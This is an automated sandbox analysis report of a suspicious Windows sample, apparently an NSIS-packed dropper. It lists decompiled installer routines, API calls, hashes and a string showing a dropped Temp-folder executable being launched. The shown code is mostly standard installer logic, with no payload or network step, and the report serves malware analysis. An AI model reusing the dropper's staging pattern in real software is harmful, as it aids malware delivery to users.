                                                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00000000,C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00436000,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
                                                          • API String ID: 1941528284-453250099
                                                          • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                          • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                          • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                          • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 524 4069c5-4069e5 GetSystemDirectoryW 525 4069e7 524->525 526 4069e9-4069eb 524->526 525->526 527 4069fc-4069fe 526->527 528 4069ed-4069f6 526->528 530 4069ff-406a32 wsprintfW LoadLibraryExW 527->530 528->527 529 4069f8-4069fa 528->529 529->530
                                                          C-Code - Quality: 100%
                                                          			E004069C5(intOrPtr _a4) {
                                                          				short _v576;
                                                          				signed int _t13;
                                                          				struct HINSTANCE__* _t17;
                                                          				signed int _t19;
                                                          				void* _t24;
                                                          
                                                          				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                          				if(_t13 > 0x104) {
                                                          					_t13 = 0;
                                                          				}
                                                          				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                          					_t19 = 1;
                                                          				} else {
                                                          					_t19 = 0;
                                                          				}
                                                          				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                          				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                          				return _t17;
                                                          			}








                                                          0x004069dc
                                                          0x004069e5
                                                          0x004069e7
                                                          0x004069e7
                                                          0x004069eb
                                                          0x004069fe
                                                          0x004069f8
                                                          0x004069f8
                                                          0x004069f8
                                                          0x00406a17
                                                          0x00406a2b
                                                          0x00406a32

                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                          • wsprintfW.USER32 ref: 00406A17
                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                          • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                          • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                          • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 531 405b99-405be4 CreateDirectoryW 532 405be6-405be8 531->532 533 405bea-405bf7 GetLastError 531->533 534 405c11-405c13 532->534 533->534 535 405bf9-405c0d SetFileSecurityW 533->535 535->532 536 405c0f GetLastError 535->536 536->534
                                                          C-Code - Quality: 100%
                                                          			E00405B99(WCHAR* _a4) {
                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                          				struct _SECURITY_DESCRIPTOR _v36;
                                                          				int _t22;
                                                          				long _t23;
                                                          
                                                          				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                          				_v36.Owner = 0x4083f8;
                                                          				_v36.Group = 0x4083f8;
                                                          				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                          				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                          				_v16.lpSecurityDescriptor =  &_v36;
                                                          				_v36.Revision = 1;
                                                          				_v36.Control = 4;
                                                          				_v36.Dacl = 0x4083e8;
                                                          				_v16.nLength = 0xc;
                                                          				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                          				if(_t22 != 0) {
                                                          					L1:
                                                          					return 0;
                                                          				}
                                                          				_t23 = GetLastError();
                                                          				if(_t23 == 0xb7) {
                                                          					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                          						goto L1;
                                                          					}
                                                          					return GetLastError();
                                                          				}
                                                          				return _t23;
                                                          			}







                                                          0x00405ba4
                                                          0x00405ba8
                                                          0x00405bab
                                                          0x00405bb1
                                                          0x00405bb5
                                                          0x00405bb9
                                                          0x00405bc1
                                                          0x00405bc8
                                                          0x00405bce
                                                          0x00405bd5
                                                          0x00405bdc
                                                          0x00405be4
                                                          0x00405be6
                                                          0x00000000
                                                          0x00405be6
                                                          0x00405bf0
                                                          0x00405bf7
                                                          0x00405c0d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405c0f
                                                          0x00405c13

                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                          • GetLastError.KERNEL32 ref: 00405BF0
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                          • GetLastError.KERNEL32 ref: 00405C0F
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3449924974-3916508600
                                                          • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                          • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                          • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                          • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 537 406187-406193 538 406194-4061c8 GetTickCount GetTempFileNameW 537->538 539 4061d7-4061d9 538->539 540 4061ca-4061cc 538->540 542 4061d1-4061d4 539->542 540->538 541 4061ce 540->541 541->542
                                                          C-Code - Quality: 100%
                                                          			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				intOrPtr _v8;
                                                          				short _v12;
                                                          				short _t12;
                                                          				intOrPtr _t13;
                                                          				signed int _t14;
                                                          				WCHAR* _t17;
                                                          				signed int _t19;
                                                          				signed short _t23;
                                                          				WCHAR* _t26;
                                                          
                                                          				_t26 = _a4;
                                                          				_t23 = 0x64;
                                                          				while(1) {
                                                          					_t12 =  *L"nsa"; // 0x73006e
                                                          					_t23 = _t23 - 1;
                                                          					_v12 = _t12;
                                                          					_t13 =  *0x40a5ac; // 0x61
                                                          					_v8 = _t13;
                                                          					_t14 = GetTickCount();
                                                          					_t19 = 0x1a;
                                                          					_v8 = _v8 + _t14 % _t19;
                                                          					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                          					if(_t17 != 0) {
                                                          						break;
                                                          					}
                                                          					if(_t23 != 0) {
                                                          						continue;
                                                          					} else {
                                                          						 *_t26 =  *_t26 & _t23;
                                                          					}
                                                          					L4:
                                                          					return _t17;
                                                          				}
                                                          				_t17 = _t26;
                                                          				goto L4;
                                                          			}












                                                          0x0040618d
                                                          0x00406193
                                                          0x00406194
                                                          0x00406194
                                                          0x00406199
                                                          0x0040619a
                                                          0x0040619d
                                                          0x004061a2
                                                          0x004061a5
                                                          0x004061af
                                                          0x004061bc
                                                          0x004061c0
                                                          0x004061c8
                                                          0x00000000
                                                          0x00000000
                                                          0x004061cc
                                                          0x00000000
                                                          0x004061ce
                                                          0x004061ce
                                                          0x004061ce
                                                          0x004061d1
                                                          0x004061d4
                                                          0x004061d4
                                                          0x004061d7
                                                          0x00000000

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004061A5
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1968954121
                                                          • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                          • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                          • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                          • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 543 403c25-403c34 544 403c40-403c48 543->544 545 403c36-403c39 CloseHandle 543->545 546 403c54-403c60 call 403c82 call 405d74 544->546 547 403c4a-403c4d CloseHandle 544->547 545->544 551 403c65-403c66 546->551 547->546
                                                          C-Code - Quality: 100%
                                                          			E00403C25() {
                                                          				void* _t1;
                                                          				void* _t2;
                                                          				void* _t4;
                                                          				signed int _t11;
                                                          
                                                          				_t1 =  *0x40a018; // 0xffffffff
                                                          				if(_t1 != 0xffffffff) {
                                                          					CloseHandle(_t1);
                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                          				}
                                                          				_t2 =  *0x40a01c; // 0xffffffff
                                                          				if(_t2 != 0xffffffff) {
                                                          					CloseHandle(_t2);
                                                          					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                          					_t11 =  *0x40a01c;
                                                          				}
                                                          				E00403C82();
                                                          				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsa497E.tmp\\", 7); // executed
                                                          				return _t4;
                                                          			}







                                                          0x00403c25
                                                          0x00403c34
                                                          0x00403c37
                                                          0x00403c39
                                                          0x00403c39
                                                          0x00403c40
                                                          0x00403c48
                                                          0x00403c4b
                                                          0x00403c4d
                                                          0x00403c4d
                                                          0x00403c4d
                                                          0x00403c54
                                                          0x00403c60
                                                          0x00403c66

                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                          • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                          • C:\Users\user\AppData\Local\Temp\nsa497E.tmp\, xrefs: 00403C5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa497E.tmp\
                                                          • API String ID: 2962429428-3428511127
                                                          • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                          • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                          • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                          • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 635 40603f-40605a call 406668 call 405fe2 640 406060-40606d call 4068ef 635->640 641 40605c-40605e 635->641 645 40607d-406081 640->645 646 40606f-406075 640->646 642 4060b8-4060ba 641->642 648 406097-4060a0 lstrlenW 645->648 646->641 647 406077-40607b 646->647 647->641 647->645 649 4060a2-4060b6 call 405f37 GetFileAttributesW 648->649 650 406083-40608a call 40699e 648->650 649->642 655 406091-406092 call 405f83 650->655 656 40608c-40608f 650->656 655->648 656->641 656->655
                                                          C-Code - Quality: 53%
                                                          			E0040603F(void* __eflags, intOrPtr _a4) {
                                                          				int _t11;
                                                          				signed char* _t12;
                                                          				long _t16;
                                                          				intOrPtr _t18;
                                                          				intOrPtr* _t21;
                                                          				signed int _t23;
                                                          
                                                          				E00406668(0x425f50, _a4);
                                                          				_t21 = E00405FE2(0x425f50);
                                                          				if(_t21 != 0) {
                                                          					E004068EF(_t21);
                                                          					if(( *0x42a278 & 0x00000080) == 0) {
                                                          						L5:
                                                          						_t23 = _t21 - 0x425f50 >> 1;
                                                          						while(1) {
                                                          							_t11 = lstrlenW(0x425f50);
                                                          							_push(0x425f50);
                                                          							if(_t11 <= _t23) {
                                                          								break;
                                                          							}
                                                          							_t12 = E0040699E();
                                                          							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                          								E00405F83(0x425f50);
                                                          								continue;
                                                          							} else {
                                                          								goto L1;
                                                          							}
                                                          						}
                                                          						E00405F37();
                                                          						_t16 = GetFileAttributesW(??); // executed
                                                          						return 0 | _t16 != 0xffffffff;
                                                          					}
                                                          					_t18 =  *_t21;
                                                          					if(_t18 == 0 || _t18 == 0x5c) {
                                                          						goto L1;
                                                          					} else {
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				L1:
                                                          				return 0;
                                                          			}









                                                          0x0040604b
                                                          0x00406056
                                                          0x0040605a
                                                          0x00406061
                                                          0x0040606d
                                                          0x0040607d
                                                          0x0040607f
                                                          0x00406097
                                                          0x00406098
                                                          0x0040609f
                                                          0x004060a0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x0040608a
                                                          0x00406092
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040608a
                                                          0x004060a2
                                                          0x004060a8
                                                          0x00000000
                                                          0x004060b6
                                                          0x0040606f
                                                          0x00406075
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406075
                                                          0x0040605c
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                          • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00406098
                                                          • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004060A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: P_B
                                                          • API String ID: 3248276644-906794629
                                                          • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                          • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                          • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                          • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 658 407194-40719a 659 40719c-40719e 658->659 660 40719f-4071bd 658->660 659->660 661 407490-40749d 660->661 662 4073cb-4073e0 660->662 665 4074c7-4074cb 661->665 663 4073e2-4073f8 662->663 664 4073fa-407410 662->664 666 407413-40741a 663->666 664->666 667 40752b-40753e 665->667 668 4074cd-4074ee 665->668 669 407441 666->669 670 40741c-407420 666->670 673 407447-40744d 667->673 671 4074f0-407505 668->671 672 407507-40751a 668->672 669->673 674 407426-40743e 670->674 675 4075cf-4075d9 670->675 676 40751d-407524 671->676 672->676 678 406bf2 673->678 679 4075fa 673->679 674->669 680 4075e5-4075f8 675->680 681 4074c4 676->681 682 407526 676->682 683 406bf9-406bfd 678->683 684 406d39-406d5a 678->684 685 406c9e-406ca2 678->685 686 406d0e-406d12 678->686 688 4075fd-407601 679->688 680->688 681->665 689 4074a9-4074c1 682->689 690 4075db 682->690 683->680 691 406c03-406c10 683->691 684->662 694 406ca8-406cc1 685->694 695 40754e-407558 685->695 692 406d18-406d2c 686->692 693 40755d-407567 686->693 689->681 690->680 691->679 696 406c16-406c5c 691->696 697 406d2f-406d37 692->697 693->680 698 406cc4-406cc8 694->698 695->680 699 406c84-406c86 696->699 700 406c5e-406c62 696->700 697->684 697->686 698->685 701 406cca-406cd0 698->701 706 406c94-406c9c 699->706 707 406c88-406c92 699->707 704 406c64-406c67 GlobalFree 700->704 705 406c6d-406c7b GlobalAlloc 700->705 702 406cd2-406cd9 701->702 703 406cfa-406d0c 701->703 708 406ce4-406cf4 GlobalAlloc 702->708 709 406cdb-406cde GlobalFree 702->709 703->697 704->705 705->679 710 406c81 705->710 706->698 707->706 707->707 708->679 708->703 709->708 710->699
                                                          C-Code - Quality: 99%
                                                          			E00407194() {
                                                          				signed int _t530;
                                                          				void _t537;
                                                          				signed int _t538;
                                                          				signed int _t539;
                                                          				unsigned short _t569;
                                                          				signed int _t579;
                                                          				signed int _t607;
                                                          				void* _t627;
                                                          				signed int _t628;
                                                          				signed int _t635;
                                                          				signed int* _t643;
                                                          				void* _t644;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					_t530 =  *(_t644 - 0x30);
                                                          					if(_t530 >= 4) {
                                                          					}
                                                          					 *(_t644 - 0x40) = 6;
                                                          					 *(_t644 - 0x7c) = 0x19;
                                                          					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                          					while(1) {
                                                          						L145:
                                                          						 *(_t644 - 0x50) = 1;
                                                          						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                          						while(1) {
                                                          							L149:
                                                          							if( *(_t644 - 0x48) <= 0) {
                                                          								goto L155;
                                                          							}
                                                          							L150:
                                                          							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                          							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                          							 *(_t644 - 0x54) = _t643;
                                                          							_t569 =  *_t643;
                                                          							_t635 = _t569 & 0x0000ffff;
                                                          							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                          							if( *(_t644 - 0xc) >= _t607) {
                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                          								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                          								_t628 = _t627 + 1;
                                                          								 *_t643 = _t569 - (_t569 >> 5);
                                                          								 *(_t644 - 0x50) = _t628;
                                                          							} else {
                                                          								 *(_t644 - 0x10) = _t607;
                                                          								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                          								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                          							}
                                                          							if( *(_t644 - 0x10) >= 0x1000000) {
                                                          								L148:
                                                          								_t487 = _t644 - 0x48;
                                                          								 *_t487 =  *(_t644 - 0x48) - 1;
                                                          								L149:
                                                          								if( *(_t644 - 0x48) <= 0) {
                                                          									goto L155;
                                                          								}
                                                          								goto L150;
                                                          							} else {
                                                          								L154:
                                                          								L146:
                                                          								if( *(_t644 - 0x6c) == 0) {
                                                          									L169:
                                                          									 *(_t644 - 0x88) = 0x18;
                                                          									L170:
                                                          									_t579 = 0x22;
                                                          									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                          									_t539 = 0;
                                                          									L172:
                                                          									return _t539;
                                                          								}
                                                          								L147:
                                                          								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                          								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
